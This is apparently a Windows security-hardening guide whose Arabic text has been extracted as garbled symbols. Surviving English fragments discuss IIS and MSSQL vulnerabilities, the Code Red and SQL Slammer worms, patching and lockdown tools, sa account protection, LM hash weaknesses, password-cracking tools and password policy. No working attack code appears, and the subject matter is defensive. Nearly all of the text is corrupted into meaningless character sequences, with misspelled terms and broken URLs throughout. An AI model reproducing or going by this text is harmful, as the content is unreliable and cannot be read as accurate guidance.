!" 1 23 4 0 &'( 7 !89 " 0 25 ?# A 5L M 9 N M 9" ) , < % ! ) ! $ @) F 7, , 6 &1@ ) (E $ F : ), 6 - % ! " /) 56% ! -") ) 'D ? , , - . 6;. " - 56 $ ) 5B !C 8 %K &' * + : -,< =! > ?@ J ) # $% ! GH ) 5 2' O* ! 5E 2 ' I I H? " ?@ P 4) ,N 0 ,G R4 S @ 3W 3 P B 9 2 F) % 1 $ ' ?5F ' 785/ 0 T) , % ! ) - 5 - Y $-,< 3 < , * $ 3 M, 6 " 6 % ( $O * 7 2 5 " ^ L ) ?5F 6 @ 0, 5 " - Y H7 E ) F 78# 2 5 =GX F) B ! $ R4 S @ ^ R4 S @ d * ? &560 " 6& $? 5F ) 6- Y/] Code Red ) $7 !89 : 6A) " $\ R N6 2 $% ! 3 0, F %K ? @ > GP 8 $ Ba I K6 6 ? " V, I 5 ,G * $M,6? G ) X )? " R4 S @ ^ K 0, 5 #P < "), ) - .) & 5 Q 6U ) ) [ 3 _ R4 S @ ^ N &1@ ) K < 0 c - ) 6? " N` 6?), ) - # M 9 6 =GX - Y Z I , ) 6( R4 S @ ^ < b R4S @ I 5 -, < 2 ), 5B ! 7, 0, < S 0,< ,6 3 K c ! 5E 6 'G " U4 $ 2 0 3 % ! 6 $ N 4 ) B 6A) $, , e G $ R4 S @ ^ " 6% DY/ 4 63 R4 S @ ^ 2 5 $_ 1 f 4] "), ) 0 3 R4 S @ ^ F) " [ &1 @ ) K < 0 )@ h < 6 A" ? " , ) " ? , 0 =GX - " ) 6 S " 6 ! 5E 1) U# - < F 4 ) A8 % L/ $% ! 7c 9 $U 785/ ) 7 , , SB g $, - <?@ R4 S @ ^ ,F 7c 6 '? 5F #P< ) 0 4 63 bP 56 % ! 6 ? F i: R4 S @ ^ -, " ) 0, 6 ( E ("c 7 ,H ) <@ ? @ % ! 6 F - K6 F -) -") - F 0, 5 "), ) - 3 I 5 ("c 6%5G1 % <) bP B5# ) , Y 7 !89 K6 ? F 25F b f % ! 6 , G 785/ ? - Y % ! R4 S @ ^ ! R4 S @ ^ ! "# i: 6 ? G _7) Y 2 5 ? " 0 4 1 $ # "), ) - Y G ) 6 * ] "), ) " $-,< ( E - )\ a 5 • Internet Information Serveces (IIS) • Microsoft SQL Server (MSSQL) • Windows Authentication • Internet Explorer (IE) • Windows Remote Access Services • Microft Data Access Componenets (MDAC) • Windows Scripting Host (WSH) • Microsoft Outlook Outlook Express • Windows Peer to peer File Sharing (P2P) • Simple Nerwork Management Protocol (SNMP) 785/ -,5! ] MSSQL ) IIS 6 3 $_) ) $ 1 2 T) j * 0 3 4 ! " % &# ' Internet Information Services (IIS) 3 IIS R 4 S @ $e 'j 4 , # 4 ) 7 5 I a, 5 6 ' " 7, , ", ) -, _ 3] G 0, 5 I K6-, " 4 j 4 0, 5 N ISAPI 7 B 5! ( E - Y $O) Y 6ISAPI 6 B'" $IIS 0, 5 ,F ) W 3 7 B 5! (&B $ISAPI _SL ] IIS SL ? 
" ) Code Red, Code red 0, < P 4 F - Y 0, < - Y V < ) Server Side (SSI) Includes $Server Pk ) - PSL 3 M ,6 4 " IIS K6% '^ P ) N P56 I 5 _ < bP 0, 23 , - 9*5 • % K6% '] ISAPI -,< 3 < % ISAPI " PHP ) Coldfusion Active ZF• 37 -, 6 U ) W 3 ,G ) 6% '23 , - 9*5 ) j 5 • h / 6- DLL O G 7P [ ? 5 TG' g • _DOS] b) 6 B'? @ SL ? 5F l '=GX " b " ,G ) e 'j 4 7 L C 85! - Y Z ,< 6 B'" O * % H $l ' 6 B' Q 6 " K6 5 0, - 5 - Y 5 l ' 6 / 9 H F ,1 ) " ) -,6 , 6 P! & I & IIS % < $O) ? , 6 U ) 0, -, < / 9 $O) -, 6 U ) B 5! b . ? # IIS - 5 < K I h / 7 !89 7P [ I5 %K ? 5 m.1 ? @ #B 5! 6 K 5 " ) - " 3 0 ) - *1 0, 5 6' 'N 6% ' N " $ 1 ) SL " U 4 IIS S ntdll. Dll Web R4 S @ ^ ) 6 ' _U ) ? 5 T G' g] Dos \ U) ) 8Q 0 )@ C 3 I H ? 5F $ F 6 ) nH 6 3 ], < 6 ' ? 5F F " " 785/ ? # IIS5.0 # R4 S @ ^ , N ) ( N (, ! F) E F H ?5F ) N -, 6 U ) ) DAV 0, -, 6 3 - *1 7 F 0_URL SL IIS ) 7 ) X , ,F R 4 S @ ^ =GX o F) F ") ) i. ) K6% , # 4 (,! % 1 , , & IIS ], 5 4)7 # & PHP, Coldfusion ", $ R4 S @ ^ ,< 0_ N T L. -, < SL T L. T L. T#< ) " 6=GX ) 78# - Y IIS 5.1 * 0, 5 - Y IIS 6.0 " pqqs "), ) ) G:H 785/ % IIS K , # ) -, 7, ) ' ) # I5 ? : 0 5 - Y 2 ) % < ' ) # 2 < IIS 1t # S L ?@ ) #P< ) ^ ? , 0 3 0, 5 ( N IIS S " IIS 0, 5 ! ". /0(123& 6 & 2 , ,F & : K A & ? L IIS R 4 S @ $, < -, , N $S L XP"), ) • l ' R4 S @ : ) e 'j 4 7 l ' pqqq "), ) • Professional * " + ) SL NT 4.0 "), ) • -, 6 U ) 0 6Patch +, - Y IIS 4.0 " - Y q$r IIS " 0, 5 I ] 0, N 0, 5 6 ' - $() * 0, 5 6h @ , bP Baseline Securiy Microsoft Analvzer ,6 3 $, -, ! : -,< 7, 0 4 GX) I 5 ?@ " ) ' ,G !89 + K 3j $ F -,< - IIS GX) ("c ') # #B 5! 0 bP ) S b R4 S @ ^ . " $ 'S +H ) , Y Cheklists a I -,< K , "2 <" @ 7 , 6, @ '? 5 TP , " - Y $ B / , ,F =GX ^ =< 7" 5 0 Auto Update , windows Update 0 0 6Patch 2 3@ -,< K ,6 * 6Patch 6 h @" ? ' IIS " ) - " l 6? , X ! ) - @ T L. 6 Update ? # _ ' ) # 1 ) ) X ^ Patch " I5 S K6 & ) B . 
)j 4 ("c 5 - Y % H l ' & 0, 5 ' & * I 2 3@ 0, -,< K Patch 2 3@ ) b 6 K XP < " # - Y IIS - 56 PHP ("c 0 5 SL IIS -, < 'X 6 : Patch % < $ ' ) # ' ) # (N K http://www.microsft.com/technet/security/tools.hfnetchk.asp ) Perliis, CouldDusion " ' ! "), ) ) pqqq "), ) NT 4.0 "), ) ) 0 6Patch Checker Network Security Hotfix (HFNetchk) ? , F 456 123& 5 ( N $-, < K - Y F # O B : -18 9 Patch # 7"! & 1 ) Patching 0 -, < S L -, 6 U ) ) ) ( N6 K6A) " ! " %& IIS DY/ 6 $ #P< ? , 0, @ %5G - Y IIS " - Y i: Z IIS ,< -, < ( E -,< K 6 < " (N P ) GF l '7c L. 6 F 6U ) ) Windows -, < 'X 7c L. g] -,< 'X 7c L. " ( N6 bP ? , 0, 6 ( E - (#=% ! & 2> Lockdown IIS :; < & ? @ ) ("c 6 ("c ) - P 3 15 IIS IIS &) IIS SL K h @" ? 0 5 F 25 I * 0 - & < ') # Lockdown -, . com/technet/security/tools/locktool.asphttp://www.microsoft ' 3 I SL " 7 : Expert u? "7 u?# S ) Custom 1/ l' F IIS SL 2, 0 5 d * ^P 6 'IIS a ?@ F) 5< I N ] WebDAV ? 5 TG' g • b. # _,< Printer, ism. a I ] ) X g < " $O) . 6ISAPI extensions ? 5 TG' g • _Idq, htr IIS - 56 -,< K b C 5! T) , 5 7 - 3 ) Code Blue HTTP 0, < 6, " ? URLScan ? @ A" 4 " % PH K6 ) cmd.exe 27 ? 2 & @ 2> I IIS R4 S @ ^ 6 3 I] 1 ) K LLS Lockdown. . 15 bP 785/ " 7 L * 2 ` A R4 (,! ;! &) - 5 l ' " ,G 6, " Code Red 85/] , 5 5 - Y , #4 0, < -, 6 U ) http://www.microsoft ah @ " 0 - Y ?5F URLSean B'0_Buffer Ovrflow \ " 3 + • Z&F " O) -, 6 U ) 0_tftp. -HTTP + , 5 MR/ • 6 N b ?@ ? ' & com/technet/security/tools/locktool.asp R4 S @ : 2 ) Microsoft SQL Server (MSSQL) _MSSQL] ' ) # , F R 4 S @ : 2, - 9 *5 ) !89 3 0, 5 7 . 6 ' ? 5F 2#5 & -, 6 U ) 3 M, 6 F / 7 !89 i. R4 S @ ^ -, < = ' ?# SQL ? , 6 U ) b ? & MSSQL ( 5! W 3 F - Y u $h SQL -, 6 U ) , 7 / 23 , # 4 (, ! % 1 , )W 3 0, HS @), , e 6=GX " ! ?@)- G ?5F SQL- Slammer/ Spida Hell/ Sapphire ) SQLSnake/ Spida ( ) 0, 5 ) - Y MSSQL -, < 3 < =GX ^ 3 ?1 ( E l ' R4 S @ : 2' , F F E F) Tu<] , 6( : - " _pqqs ) pqqp T ] - 785/ 6 1 @A I 0_T " -,< TG'] SQLSnade/ Spida ( b. , 6h @ ) + : , - 1 @ ? 
& 0, 6 #P < ' $ R4 S @ ' a 5 - Y aMay 2002] l ' 6( j &' Kc ,/ B5# 7 !89 ? " 7, 6 4" " ? K c $l ' B5# 7 !89 • http: //isc. Incidents. Org/ ang lysis. Html? Id= 157 • http: //www.eeye. com/ html/ Research/ Advisories/ AL20020522. Html. • http: //www.cert. org/ incident- notes/IN-2002-04. Html. T G'] SQL-Slammer/SQL-Hell/Sapphire ( : B5# 7 !89 aJanuary 2003 v • http: //isc. Incidents. Org/ analysis. Html? =157 • http: //www.nextgenss. com/ advisories/ mssql-udp. Txt • http: //www.eeye. AL20030125. Html com/ html/ Research/flash/ -,< • http: //www.cert. org/advisories/ CA-2003-04. Html ) wxss 4 Internet Storm Center b 67 K67 4 B 5F " _MSSQL -, 6 U ) ,< 0 , #4 " ? 59 T L/ 0, 2 0 I5 F DY/ , ( , H ? @ ? 5 T G' g sa Account " ? 6 " ) h, / - P 6) ( E : " %# T 0, 5 " # 6 2< ) U) ) 6 $l '( % N 4$ gatway \ ' A) 2 # N 7 UDP ^ 0_-,< - < 7 4 ' L /] , < %# H wxsx 7 bP #4 4y !89 F 3 H, , e G ) I Z F MSDE ? @ ) \X !89 ? ,6 Patching 6j 4 7 L z) 3 ) ) ) -" F] _ SQL -, 6 U ) 6 F SQL bP MSDE 2000, Microsoft Server 2000 Deskrop Engine ,G 0 ' !89 1 @),, e G ("c 7 ,H 5 B') 6 #B 5! 5 l ' GH ) h 0 ' ,6 3 , -, < K 7 , 3& @,, 0 [ I5 ) -,< N wxsx 7 4 5 0, 5 ' Resolution Service Overflow Stack Buffer \ 2 ), < ? SQL Slammer ( 2 6 & 3 account ?@ " h "?& R4 S @ ,L K6U ) I SF l 'Buffer Overflow 0 ( ,H ( " : Sa Account 0 5 P !& Buffer Overflow _% 5/] A bP B5# 7 !89 - . _0 < 5 - Y SQL/MSDE Z F SQL Server .. 0 < 5 - Y I -, ` 4 P !& account ^ K7 L #B 5! - . Null _,< - Y Chang the SQL Sevr Admininistror Login h @ ?@ d * b SQLSnake ( N , ) 67 4] wxsx 25F , account ("c : " # e 'j 4 H _ '#< - N] sa account] e 'j 4 0 -, < K A & h #P < 6 #B 5! "] SQL Lite Server ? G ? 2 P / ?P / " " -, < S L Server SQL " * ) 6 @, < ) 7c L. - 56 Z&F " ? @) # ? G MSDE 2000 0, , P a • *< SL " SQL/ MSDE Server 2000 (Developer, Sradard and Enterprise Editions) • Visral Studio. NET (Architect, Developer and professional Editions) • ASP. 
NET Web Matrix Tool • Office XP • Access 2002 • Visral Fox Pro 7.0/8.0 0, 5 , -Y , 6 3 SQL/MSDE -, 6 U ) #40 = B* 6A) " - Y 8Q 0 < C A " - Y $? , H? , _TCP 7 0_ F) & -, < - < wxsx 7 wxss 7 4 / 9 -, - 0, TL 4 $pqqq MSDE F UDP &1 # ?), # Overflow Buffer ^ 4 U) 60 ? , d* ") GX) $, < , 6 3 ( E UDP h 6 ;! $,< )- %L ?@ UDP U) ^ 0 $-, 6 U ) -, < ? , X02 0, < " * A) " I ' ,6 3A wxsx 7 4 ) !89 K6 $ ( 4 #4 NAMED PIPES ) l '7 4 0 3 l ' , 6" - Y ? # ] , ? ! l '7 6 L ? ? , #) ) TL - . T !89 $ ( E 4" - Y pqqqMSDE !89 56MSDE ) SQL -, 6 U ) y 6567 # b & ?@ N? 4] Session NetBIOS 4 xxr|ws{ 7 ^ ,K U) # R4 S @ ^ ( E U) TCP U) 6? G MSDE " l ' 6 &'( !89 !89 3 : F) -, 6 U ) \ 2 " 785/ 6, " # ?@ F pqqqMSDE ' 6-" Z F System Local ,L account ^ , 4 # " I ' ] 0,< ,6 3 ) User Domain $ F 6- Y/ " & @ 0,6 ,L Overflow Buffer ) - Y ,L , , j6 F ("c 5 $ nH Critical Update a I ! ' R4 S @ 7 K &F &1 @ ) K <@ ' - Y _, H , , ) - 9* e G 6& " - Y ) ' 0 5 ( N6 [ 0 5 - Y Incidents.org h @ " ? - Y $, 5 ? @- 6% '7 "), ) Microfoft SQL /MSDE Desktop Engine " ,F 7 0,< ,6 3 N : ) 8 ( 6& " h @n ^ +, 6* " 6 6) , < -, < SL 2000 &'( HS @),, 2 e G 2 l' ) pqqq SQL/MSDE Server7.0 $, 5 + K K Kit Microsoft SQL $ SQL/MSDE 56 - Y - Y $, 5 0, 5 - $() * SQL/MSDE Server, F , # 4 ) Patching " 5 % < 6 #P < ) Domain ( 5 ? 6 ^ " SQL Slammer # , # 4 ) Patching " 5 nH 3) l ' F ! 5E - Y MSDE 2000 ! ". /0(123& ') # < 9" ? http://www.microsoft.com/sql/downloads/securitytools.asp ? @ SQL Critical Update Kit $-,< K Toolkit 0 5 , 4 6 & % < ) -,< -, & SqlSecurity.com 0 SQL Critical Update ) SQL Scan !89 - K 5 $, 6 $l ' & 0 )? & A ^ UDP1434 7 4 wxsx 7 SQL Pingv2.2 ( 4 _X02 SQL ? , 6 U ) & : 2 UDP , ] 0, 5 I T Subnet ) * - 5< I SQL Scan Microsoft 0 ^P !89 ) - l ' &'( #B 5! 0, 5 TP ("c v 4 ?@ (8! ! " %& "7 B 5! $l ' R4 S @ : % 9 456 123& 6 DY/ I a K5 GDEFE UDP C 2A SQL/MSDE Monitor Service ? 
2A& A * AB • -, < K 6 S @ : ) BH " - Y ) SL MSDE 2000 ?), ) ) - " ) - Y UDP n 9 " F User & @ b ) %L 6 O* 'L 7 T ( ,H $ )- #P< #P< ) 6-" 1 @ " U4 F SB #P < ) ^ account 2#5 F &1 e G O* 'L 7 R4 N`6 0 <; ! ) Domain 6- Y/ " 0,6 UDP 1434 7 4 ,L 0, 5 6 0, 5 T s}~ IP !89 6h @ 0 ? 5 TG' g ] Dos \ " F _U ) 7 B 5! MSDE SQL/MSDE 1 , I SQL/MSDE -, 6 U ) F 4 # " I' ' $l '( ' " MB/Sec - E 4 " j - 1 @ 2< 0 ,K 3 I F I Ms-SQL/MSDE Slammer ( !89 Multicast \ " $, n . $W , $ ,L s}~ % < , 6 3 j &' -, 6 U ) FSystem Local ' - Y $, 3(E Buffer Overflow , MSDE2000 H , , ) - 9* e G $ $l ' 0 5 SQL Pack 3a Server 2000 - 56 F ' n 9" ( ,H ? ( E ?# C 85! ) W L 3 + : $-,< P [ 7< & h 0,< ,6 3 3 #P < Pack Service # 7"+ H ; • Pack Service 6* 2 3@ G2000 a" , SQL/MSDE Server 7.0 Service Pack 4 Pack 3a MSDE/SQL Server 2000 Service P ! G Pack Service # A 7" I A1A 8 9 Patch # 7"+ H ; U) 6* b 5 -, < K 6Patch 2 3@ " -,< K - Y " 6h @ " ? I SQL/MSDE/MSDE -, 6 21 " ? F Patch 2 3@ SL " ? 59 a 6@ I 0 5 - Y ') # SQL/MSDE -, 6 U ) : SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000(MSDE 2000) MSDE 9 <+ &H J K 7 + ,Patch + H ; • Patch # 7" I L2 Tasks Elevation of Privilege in SQL/MSDE Server 'G " U 4 G A &1A 8 Patch ? $ Web MS02-061 I 0 -, a 5 - Y K " "2 9 -,< K Patch 2 3@ " 6h @ " ? 6 @ ) ? 59 SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000(MSDE 2000) MSDE I GPack Service # A 7" I A1A 8 A 9 Patch # A 7"+ H A ; • -, 6 U ) 6* - Y b ' ) # -, 6 U ) 5 -, < K -, < K 6Patch 2 3@ " 21 " ? SQL/MSDE/MSDE F Patch 2 3@ S L " ? 59 : a - Y " 6 @ I 0 5 SQL/MSDE 6h @ " ? SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000 (MSDE 2000) MSDE Patch # 7" I A 9 M2 <+ &H J K 7 + ,Patch + H ; • Tasks Elevation of Privilege in SQL/MSDE Server 'G " U 4 G A &1A 8 Patch ? $ Web MS02-061 I 0 -, K "2 9 I 0 -, a 5 - Y K " Patch 2 3@ " 6 @ ) ? 59 -,< K Patch 2 3@ " 6 @ ) ? 59 "2 9 6h @ " ? 
SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000( MSDE 2000) MSDE C 5! l '? # GAuthentication Logging SQL Server ? 2A& A *• Enterprise Manager 785/ 2 1 ), _sa” ( " n 9" ? # G ;NA 8 A sa Account # 0 , F, , e G j * $, < -, < K 7 4" Server Book Online sa Account P !& ? " - Y O%A • 1A, I A+ 3 _blank] # $ MSSQL/MSDE P !& SQL/MSDE -,< DY/ P !& ("c 0 < , 63 H Administrator (SA) Login System 2t 5: W L3 ("c ? 59 - Y SQL/MSDE SQL/MSDE -, 6 U ) 0_ TG' g 5 ( ,H 2 ^ - Y l 'account " 9 K 7, 5 0 _Server Properties Security ] , account " -, < 3 <] e 'j 4 ^ ?@ ? 5 TG' I R4 7 ) X ("c /] 0 7 ,H the SQL Server Administrator Login j * ) ' ) # % & $, 5 MSDN / 5 -, < and Change the System Administrator Password by Using ) $ Changing ) , #4 I -,< K 6 ) 7 # 2 3@ " ? MSDE Verify 0 5 - Y $sa Account S I MSSQL/MSDE I A U) 4 : Domain ? 2 ! ] Z F^ B . 7" ) _NT "), ) 6 56 A 6 A• GSQL/MSDE Server Agent 1A, . $ SQL/MSDE Server Agent ) -, 6 U ) ] Local System ) A AM2A C A ? &A I 7" ] SYSTEM S @e G U) %H , / MSSQL/MSDE account Valid ) administrator domain 0 _XP ) pqqq "), ) 0 ,6 3 #P< ) % T ?# F Z F Domain $ a 4 " : 2 auditing ) Windows NT Authentication ? 5 T G' U) $-, < F 7 #< )& @ MSSQL/MSDEServer 0, K5 T G' ? @ C, E ) = H " , 6( E N 6Login ' ? , U) , #4$? # 0, 5 - Y Authentication NT #P< " g 6- ),. F) 3 ) : y B'0 ) ) 7c L W L3 R4 7 W 3 TCP/UDP ;! , ? , 6U) ^ P P 6 ("c 6U ) 4" F 3 67 4" N 4 ( E bP ) MSSQL "E $ SQL/MSDE -, 6 U ) " 67 4 z) 3 ) ) ) ) B 3 ? 5F G5 SQL/MSDE 4 ("c # B' 0 B' G5 ) R4 S @ % y y wxss ) wxsx $, < wxsx ) wxss - Y ^ 1 @)j 0 ^ !89 $ (E 25 " - Y TCP/UDP l ' 67 4 " 6 @ a 5 - Y I " - Microsoft SQL/ MSDE Server 7.0 Security - Microsoft SQL/ MSDE Server 2000 Seurity 6h @ " ? ! " % &# 2 Windows Authentiction % G 6 6A) ? 6, ) Q0 b f -, < - ) 6 '-,< d * + " - Y + " - Y DZ 0 N` 6?), ) " U 4 ? 5F ) " )- 6% 6account # - 5 account , N ) = G0 < ( #. " I' H ?@ =GX P !& u -)8! /) + ,6 3 F) 2 3- Y R 0,< ? " H % ! 3\P ? " + P! F) , B 5! 
$ ) X a P !& < ,K , 75I € P ! & ,H ' ) = GX F 6 1G'( E 6, 4 , 4" 2 1 ), ) 2 5 ,6 3 < 6(& # " - Y ] -,< , K ? + $ 0 - 6 \ ' i: 2 1 ) E -,< 2), S @^ ,K •c $ P ! & ,H ' ) = GX account -, < K : ) -, ,6 3 = 9P ? @" 0 H , F7 , , e G < TP, ,F , , , b SB ' !89 F ) -, < = G U 4 0, < F ) , K " U4 ? @] 0,< _0 2 , K " U4 0 < ,6 3 N 1G' # , " - Y )? 6" E ) 7 " S[ ?@ 0, 6 6 1G'$ , -,< H _7) Y & P P! & ) % ' DY/ I ? ?# ? P! & 2 P ! & 2' - "E 5 $ / C 5 ?@ ?@? 6A) $ !89 6& H -, < - ?@ ) ) T) , P ! + , K " P !& 6& " ? P !& ? " 9 P ! % <& ^P R4 -,< = G Account • S DY/ (, ! • 0-,< = G , account E ?# $ F = GX 6 &'( 0, 5 4 5! , B hashing 5 N1 " -, < & ) ) , \ 2 P - F) 2 , 5 ,H 6& " - Y 0 2 ), 5 0, 5 P !& ? 5 T 0 < X ,K + " S ) ( #. 3 1 ) GP 2 W L3 6& "), ) _hashing 6 *1 E/ F) , K _ " Hash , [ 19 a " N1\ ) 6 F Hash , D " ("c ("c P ! I5 $ P !& DY/ = G 7 L , - 3• P! & message digest] - , <R ?# # b E _ < $hash , -,< 3 < 0_ P! & d • 6 E 0 ?@ -,6 ) - 3•M Y< - Y ? N1] b )d* 7 ) P ! & ,H ') )- / SB g 0 < ,6 3 ?@ h 83 ( 'hash , , Hashe , 6' P ! & Hashing N& ] 3 ) -, < N $-, @ %5G1 P • )% ! 5 "), ) 5 ] LM • NTLM • _ 5 LM] Lan Manager] " LM -, < Hash ^ XP, 2000 , "), ) LM # F 0, 5 " " 7, 5 #< $ F $, < P ! 6& - 3•_ B . 7 P LM , ( #. 6 &' * 7 , H -, %#< 2 , B G' 6 # ) P 5 ] NTLMv2 • ) ) X "), ) B G' 6b. Q # e 'j 4 7 L _ < NTLM, ] ' ) # #< - 5/ " , ] NT GX) pqqs "), ) N& T, " - Y _NTLMv2 6& $, 5 ) 7 ,H 1 ), & LANMAN Hashes] = GX S 5 P ! Z# L "), ) P ! 6& /, ) W 3 K6A) " - Y Y6 0,< , 6 3 HttpL://www.msdn.miscrosoft.com/library/default.asp?utl=/library/e n-us/security/securiy/h-gly.asp " % c, LM hashes =GX a 0, < 0, < % ,P - $ 13 0, d * &E 7 B 5! Y6 H F P Qf ) , 5 ! 5E ) 2, ) Hashe d * d * & _dictionary- style] P @ hashing LM A ) 2 6 < 0 Lan , K , @ 'SAM Lmhashes " )? , ?@ ) K62< A) % HS %H , / 0, < P !& - "), ) 2 )d * ? H F 6& • Ih / 0, 2 F 6 F - 3• :3 ) , , ,F -)8! 0 ,6 3 e 'j 4 7 L ) SB g Manager # ("c 0 N1" - Y 6- H$ ' R4 -, < S L I 5 hashes LM = GX T , K, @ ' ? ) 6 '_ , ' )n. 
R4 S @ LM hashes A) " - Y 5! ? P ! K6 < \X - < # 2 6 F K6 < 2 5 ) ,K 5 P ! , ` 4 0,< ,6 3 6 ' P !& U) 5 hash 6& • P !& d * , 6 3 -, < 2 5 > ?@ )- 5 b P ! - H, , e G -, 6 U ) 7 B 5! $, < # 6& • 0, -, < % , P • & M) / Y6% < C ' )- P ! -,< , K / S 5 ,< #< C /8: 6& • _cracking] ),. R 3 ) l '7 B 5! % 5# S P ! hashing , @ ' 6 F 6 ?# S j &'Hash T 9 P Y6j* ) C ' + >'" - Y % ,P• & M) / C 5 0, & ),. !89 5 2 <] +5 l 0 ,6 3 Y , 4 CG:H ) ?# C 85! P! 6& ? )@ GX) , - $() * 0, H,, 2 e G "), ) + 0 H F U) )- 5 V & ( #. - Y " 6@ 6 5 - < %B !)%c " # % / 0 5 - Y 1 ) $, -, ?@ # 2 " E ' B . " ) 0 ' ,6 3 #P< !89 2 C,E ,6 3 S @ e G $,< - 5 ) , 5 ,H " : 2 P! & 0, < P ! - 3• B . ) • Bc, # < F) -, 6 U ) ( ,H 62 < " \ 2 ! " 6& % E I 5 ("c #B 5! . - Y • 0 " - Y = GX 0 2000. NT "), ) # 4 ) - 5 LM hashes T <% K6 H F P, K , " HS @e G 6" E "2 0 LM -,< P ! & -, 6 - 3• # ) " I ' e 'j 4 7 L Lan Manager hahes I5 ? " b ,< ? , " ("c a , -,< SL e 'j 4 7 L XP, K6 P ! ?5F t6 F) C 8Q ) ("c 5 $ LAN Manager hash ^P # ZF 5 John the Ripper ) _LC44 ] 10phtcrack version " ? " 5 TG' 6Account 6 &'( ?@ 6* ! ". /0(123& , I 5 6A) 2 P " R 3 ?), 0, : 3? " 6& cracking P ! d * P ! & =GX +, ,6 3 E 456 123& \ '2 P )2 6%5G1 %5 ) ( #. " ? 59 #. I5 ? @ a - 2N + ,P QR & Q;3 4 ? L• P! & 6? ' T /2 ! ' ? "W L3 )S )- 6A) " - Y P ! & -, 6 d * A) # F 6 SB g 0 0, 5 ], < 2 " \ 2 0, < _?@ =B* : %5 P ! Y _password] , 5 P ! 6& O* # M /2 1 ) 2' ] ) , " <P?@ ,1 P " P ! M) / % , P ( ,H ?@ _ ("c 2 ? !7 P ! 'L #) h c 9 < )@ ] -,< F " &N F 5B 6 E H? _ 7 - -J) ("c 0 < (E " ) -,< - 1 ) K5 - 3• I ? K6 5 $O 3 & # 2 ? " 2 ), " U4 _ , P4 H& password d * 6& - <& 2 ? ) P 785/ ?, < F H I T \X W 3 - 3•" M,6] ,<P %# I 5 ("c %5G1 $-, < = G ( O %5 P !& " P ("c A" @ ? 3 # / ) KP Y1M) / " ! - 5 MR / 5B ? @d * 6& " O* , M) / P ! % ) 5B ) " )@ M) / ) KP Y1M) / " * 6 " , 6 3 785/ 3? 5F E ) O * W L3 B' ( -,< & %#< " ,G0 )- < 6 ?@ -J ) M) / ) , ! 
-,< 3 < ( 0 <- N& " - Y ) ,G I5 ) - 5 0,< ,6 3 crack 0, < -,< h PH ),/ P !& " -J ) = G password ) - P A) " <) " ,< -,< 3 < 5B 3 & 7 B 5! $& @ P 785/ P 6%#< % -,< Y ? @ 0, 5 = G N F2 P <" @ 6? " 6& password ( C ' P !& d * N F- 5 S ("c 0 5 crack 2 -, < 3 < • ,G = G - . W L3 Q # # 7 5B -, < & P! & ? (E - Y Hl ' 6 &' * " - Y T#< A" @ ) S 9* & " ) - 3• P ! 6& (8! 6%5G1 T 5! " U 4 " ? P! , 5 ,H 6& Local . I5 2 PF 62 ) " & 2 pqqs $XP $pqqq"), ) 0 6& I 5 "), ) ) 4 " ? 59 6* )- Y Q " 0, < $ ? b 6 " ? & : - Y -,< ? 7 u j &' -,< = G I5 -,6 a 5 TG' Securty Policy Local Security Policy Program Start Pr ograms Ad min istrativeTools Local Security Policy Select: Account Policies, Then password Policy a ? 5 TG' Password must meet complexity requirements $l ' ? " , ` 4 ) ( #. m .1 -, < = G I5 P! F 6 , ! 6& $ 1/ 2 account ( " 0,< * 0,< a,< " ! 5E " -) (&B 0, < a, % 5 ? ?@ " ) = G " U4 ) 3 B P H " P ! (, ! W L3 ? 5 P !& K6 % < P !& _Z A] B N P Y1• & M) / • _z a] B N PY1 q M) / • 6 H ] 6,6 _ %,µ, s/ ,! C 8Q] KP Y1 g , " 5 $ P !& j< %H ,/ " P! & u ) E E )(5 % < _{ U4 • Policy Local Security " 75 I 4(H • • 6 SB g apassword history (range: 0-24 Enforce) B P H P! & ?56C,E $ 3 5 d* 6& " - Y ? "E ? ("c ? 59 #P< ? , $S P !& " - Y v $l ' Z> " " - Y 0, 5 - Y $, ,F -,< = G P ! & 2, 2 , 0, < , ,F GX) \X ,N 2 ) - )@ I 0,< , ? b < TP, , # 4 " U4 B '8 P ! #P < 6& P! & $ Y 5 $ P !& `* d* , $") S / 0_, 5 $") S / , 2' P !& P !& I _ u _ P! ] 5! Q , / P !& 3 P !& u H B 'c ,< ,6 3 minimum password age , # 4 0,< maximum " N m.1& password history u 5 ,H ) M , 6 -, P !& P! # P !& 0 ? , (&B LOG on 7 B 5! $? : F) ?), 0, < -, < P ! 5 " - ), . " U4 ) = G _, 5 # &1$,< minimum " 0, 5 #P< F) ? , ,F F) ? , ,F P ! e 'j 4 $Characters Minimum password length 0-14 T 9 %H ,/ ] , 5 - , b , password history 0 _ P! & 3 S d* Y password history % 1 2 , 0 < ,6 * , G %H , / $l ' ,P " 6 O * password History % 1 2, 0 < ,6 * , 6& -, ("c ) - P ? " P! & _ u] = G O* <( E 6 '? @ ? " 7, ?,< 5 , 6& " , E - Y ? 
# ) -, < 2 ƒ e 'j 4 )(E Y " j password age minimum , -, < = G ,< H? l '? " 7, ] L * I _ P! ] )F $ Y I P !& 0 Days Minimum password age (range:0-999) ‚, < , 6 3 d* 2' Minimum password age 0, 6 ) [ (&B -" F ? & )" " , u # " % PH ] , 5 ) YB* F) minimum password age < # " %P H ] 0, 5 - P - Y Maximum password age (range:0-999 days) 5! Q , / $l ' $l ' 5K ) 5 GX) u ?# 0,< 5! P !& 2 d* P !& P! & = G T 9 %H , / : ("c 2 ? T 9 %H , / 0 # MR / P !& 0, < ? " 0 ' I F) 7 ) X $ Y 6 " 6 , ? 0, - 4 : 2 , - ") , W L3 )S 0 ' $ P! & F) 'Y< ) d * : , $ #P< 7 !89 6? " 2 " 3 In the domain Store password using reversible encryption for all N& " - Y P! & " K6 ? , K , @ '( E N& W L3 " ("c 6& P !& ] 6 7 $-, < DY/ 0 P! & 6 @ I - 3•0 15G P! l' P !& " - 3•$ ) ) K6%# ) 4 -, < K & $, 5 6& $, 5 - Y - Y ?, < T G'2 " - Y 0 users $l ' 2 " 4 ? 5 m .1 d* 5/ 7 # $ : I P ! 2 7 , 5 ) ) 0_ I - 3• ( &1 I ,G 0 6& " 6 P ) " %51 E I ?@ " ? K6A) " 6account " F$ 5 - Y ? R4 # 6 -, `4 a P ! b3 n 9 from Command line Promp: Net User Username/random 6) 56] -, ` 4 ) ' L I P ! P !& 6& - Y 6 P GH ) ? & cracking ("c _ P ! P ! ) -, < I5 S ^P 6 6& F$ P ! , @ '" , < ? , " ("c " E S ("c " E S 6& $l '%5G1 P 